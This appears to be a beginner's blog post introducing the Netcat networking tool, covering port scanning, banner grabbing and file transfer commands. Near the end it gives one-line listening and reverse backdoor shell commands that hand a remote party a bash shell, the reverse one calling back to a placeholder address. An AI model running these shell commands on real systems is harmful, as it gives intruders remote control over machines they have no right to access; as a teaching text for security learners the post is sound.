Netcat: Hacker’s “Swiss Army Knife”
Netcat was released in 1996, it is a networking program designed to read and write data across both Transmission Control Protocol and User Datagram Protocol. Netcat is also referred to as “Swiss Army Knife”. Netcat’s functionality is helpful as both a standalone program and a back-end tool in a wide range of applications. Netcat can be used for port scanning, transferring files, banner grabbing, port listening, redirection and more.
The goal of this blog is to provide you with a basic understanding of Netcat.
Netcat — h
Shows all the options available.
Syntax can be used as:
ncat — h
nc — h
netcat — h
nc -v -w 2 -z 192.168.1.10 20–80
In this, -v is for verbose mode, -w is for the timeout for connects, -z used for scanning mode and NC will try connecting to every port between 20–80.
Even though Netcat can be used for port scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning.
The randomize ports (-r) switch can be used to choose port numbers randomly in the range
Banner grabbing is an enumeration technique, which is designed to determine the brand, version, operating system, or other relevant information about a particular service or application. This is especially important if you are looking for a vulnerability associated with a particular version of some service. We can use NC to grab port banners in the following way:
nc -v 192.168.1.10 80
Push a file from client to the listener
nc –l -p [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
nc –w3 [TargetIPaddr] [port] <[infile]
Push [infile]to [TargetIPaddr] on [port]
Pull a file from listener back to the client:
nc –l -p [LocalPort] <[infile]
Listen on [LocalPort], prep to push [infile]
nc –w3 [TargetIPaddr] [port] >[outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]
Listening backdoor shell on Linux:
nc –l –p [LocalPort] –e /bin/bash
Create a shell on local port [LocalPort]that can then be accessed using a fundamental Netcat client
Reverse backdoor shell on Linux:
nc [YourIPaddr] [port] –e /bin/bash
Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener
A BEGINNERS GUIDE TO CYBERSECURITY TRAINING, CERTIFICATION AND JOBS